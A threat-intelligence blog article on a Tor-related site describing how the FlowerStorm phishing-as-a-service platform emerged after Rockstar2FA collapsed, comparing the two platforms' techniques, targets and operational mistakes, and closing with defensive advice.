BTC $103354.5528
ETH $2606.7338
XRP $2.5486
BNB $651.5963
SOL $176.4263
DOGE $0.2325
ADA $0.7984
TRX $0.2744
stETH $2604.1667
WBTC $103301.0649
SUI $3.9112
LINK $16.9941
wstETH $3133.2179
AVAX $24.9387
XLM $0.3034
USDS $0.9972
HBAR $0.2059
HYPE $25.1771
LEO $8.8762
TON $3.2423
BCH $402.3469
DOT $4.9744
LTC $100.8143
WETH $2603.6907
PI $0.8975
XMR $339.5057
weETH $2781.4488
PEPE $0.0000
BGB $4.7445
BTCB $103509.6329
BSC-USD $1.0007
CHEEL $5.1975
USDE $0.9987
WBT $30.3206
TAO $454.9621
UNI $6.5954
NEAR $3.0476
APT $5.7250
AAVE $229.2856
CBBTC $103403.9176
OKB $54.3944
DAI $0.9985
ONDO $1.0080
KAS $0.1206
ETC $19.8566
ICP $5.6317
CRO $0.1015
BTC $103354.5528
ETH $2606.7338
XRP $2.5486
BNB $651.5963
SOL $176.4263
DOGE $0.2325
ADA $0.7984
TRX $0.2744
stETH $2604.1667
WBTC $103301.0649
SUI $3.9112
LINK $16.9941
wstETH $3133.2179
AVAX $24.9387
XLM $0.3034
USDS $0.9972
HBAR $0.2059
HYPE $25.1771
LEO $8.8762
TON $3.2423
BCH $402.3469
DOT $4.9744
LTC $100.8143
WETH $2603.6907
PI $0.8975
XMR $339.5057
weETH $2781.4488
PEPE $0.0000
BGB $4.7445
BTCB $103509.6329
BSC-USD $1.0007
CHEEL $5.1975
USDE $0.9987
WBT $30.3206
TAO $454.9621
UNI $6.5954
NEAR $3.0476
APT $5.7250
AAVE $229.2856
CBBTC $103403.9176
OKB $54.3944
DAI $0.9985
ONDO $1.0080
KAS $0.1206
ETC $19.8566
ICP $5.6317
CRO $0.1015
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • The Rise of FlowerStorm: Successor to Rockstar2FA in Phishing-as-a-Service

    As the cybersecurity landscape continues to evolve, so too do the methods employed by cybercriminals. One of the more concerning trends in recent years is the proliferation of phishing-as-a-service (PhaaS) platforms, which simplify the deployment of phishing campaigns for malicious actors with varying levels of technical expertise. Among these, the Rockstar2FA platform emerged as a prominent name until its sudden collapse in November 2024. In its wake, a new player, FlowerStorm, has stepped in to fill the void, raising questions about its origins, operations, and similarities to its predecessor.

    The Decline of Rockstar2FA

    Rockstar2FA was a sophisticated phishing service targeting Microsoft 365 accounts. Operating under a PhaaS model, it offered clients advanced tools for bypassing detection, multiple phishing settings, and access for $200 per two weeks. The platform specialized in mimicking legitimate login pages to harvest credentials and multi-factor authentication (MFA) tokens—a critical aspect of modern cybersecurity.

    However, in November 2024, Rockstar2FA’s infrastructure suffered a major setback. According to Sophos researchers, the collapse was not due to law enforcement actions but likely a technical failure. The service’s backend servers became unreachable, and phishing pages began returning Cloudflare 522 errors, indicating disconnection from the content delivery network. Telegram channels used for command and control also went offline, effectively halting operations. This abrupt end created a power vacuum in the phishing ecosystem.

    The Emergence of FlowerStorm

    Shortly after Rockstar2FA’s decline, FlowerStorm began to rise in prominence. First detected in June 2024, FlowerStorm gained traction among cybercriminals following Rockstar2FA’s collapse. The platform shares many features with its predecessor, leading experts to speculate that FlowerStorm may be a rebranded version of Rockstar2FA, operated by the same individuals or groups.

    Both platforms employ phishing portals that replicate legitimate login pages. These portals are designed to collect user credentials and MFA tokens, relying on backend servers hosted in domains such as .com, .de, .ru, and .moscow. FlowerStorm utilizes a standardized "next.php" script for backend operations, a slight deviation from Rockstar2FA’s randomized PHP scripts.

    Similarities Between Rockstar2FA and FlowerStorm

    The parallels between Rockstar2FA and FlowerStorm are striking, suggesting a shared ancestry:

    1. Phishing Techniques: Both platforms use phishing portals that mimic login pages, incorporating fields for email, password, and session tracking tokens. They also support email validation and MFA authentication, key elements in deceiving victims.

    2. HTML Structure: The HTML code of their phishing pages contains random text in comments and utilizes Cloudflare’s Turnstile security features. Both platforms display prompts such as “Initializing browser security protocols” to lend credibility to their malicious schemes.

    3. Domain and Hosting Patterns: Domain registrations and hosting strategies are nearly identical. Activity on both platforms rose and fell in sync until Rockstar2FA’s shutdown, reinforcing the idea of a direct link between them.

    4. Operational Mistakes: Both platforms’ operators made errors that exposed their backend infrastructure, facilitating analysis by cybersecurity researchers. For instance, Rockstar2FA operated over 2,000 domains, while FlowerStorm’s network expanded rapidly after Rockstar2FA’s collapse, suggesting a continuation of operations under a new guise.

    FlowerStorm’s Unique Features

    Despite its similarities to Rockstar2FA, FlowerStorm has introduced its own elements. For example, it uses plant-themed names in its HTML page titles, such as “Flower,” “Sprout,” and “Blossom.” This thematic shift appears in other aspects of its design, including comments in its HTML code and visible security prompts designed to deceive victims.

    Additionally, FlowerStorm’s backend servers rely on specific PHP scripts for data exfiltration and authentication. It has also demonstrated greater reliance on Cloudflare’s serverless deployment tools, such as pages.dev and worker.dev, to host phishing portals. These technical adaptations highlight the evolving nature of phishing platforms and their ability to exploit modern hosting solutions.

    Targeting and Impact

    FlowerStorm’s rise has had significant implications for cybersecurity. According to Sophos, approximately 84% of FlowerStorm’s targets are located in the United States, with other significant targets in Canada, the United Kingdom, Australia, and Italy. The majority of these targets belong to industries such as engineering, construction, real estate, legal services, and consulting—sectors where compromised credentials can yield high-value information.

    The platform’s reliance on a PhaaS model means that its operators do not directly select targets; rather, this is left to their clients. However, the rapid adoption of FlowerStorm suggests its effectiveness in meeting the demands of cybercriminals. Its advanced features and ease of use have made it a popular choice for launching phishing campaigns.

    Challenges and Missteps

    FlowerStorm’s rapid expansion has not been without challenges. Researchers have identified operational misconfigurations that disrupted some of its phishing pages. For example, some pages failed to connect to their backend servers, rendering them ineffective. These errors have provided cybersecurity experts with valuable insights into FlowerStorm’s operations, enabling them to identify and counteract its infrastructure.

    Such missteps highlight the inherent risks in operating large-scale phishing platforms. While FlowerStorm’s operators have demonstrated technical competence, their mistakes offer opportunities for defenders to analyze and dismantle their operations.

    The Bigger Picture

    The rise and fall of platforms like Rockstar2FA and FlowerStorm highlight the adaptability of cybercriminal networks. When one service falters, another quickly emerges to fill the void. This underscores the need for continuous vigilance and innovation in cybersecurity practices.

    Organizations must prioritize MFA implementation, employee training, and robust email filtering to mitigate the risks posed by PhaaS platforms. Additionally, collaboration between cybersecurity firms, government agencies, and cloud service providers is essential to dismantle such operations and protect potential victims. Enhanced threat intelligence sharing and proactive monitoring are critical in staying ahead of these evolving threats.

    Conclusion

    While the exact relationship between Rockstar2FA and FlowerStorm remains speculative, their similarities point to a common origin or shared knowledge base. The evolution of FlowerStorm reflects the dynamic nature of the cybercrime ecosystem, where disruption often leads to innovation. By understanding these platforms’ methodologies and vulnerabilities, defenders can stay one step ahead in the ongoing battle against phishing threats.

    As PhaaS platforms continue to proliferate, cybersecurity professionals must remain vigilant. The fight against phishing requires constant adaptation, collaboration, and a deep understanding of adversaries’ tactics. Only by staying informed and proactive can organizations effectively combat the growing threat of phishing-as-a-service.

    The Growing Threat of Social Engineering: How Cybercriminals Stole Millions in Cryptocurrency
    From Whistleblower to Criminal: The Shocking Case of Antaney O’Connor

    Comments 0

    Add comment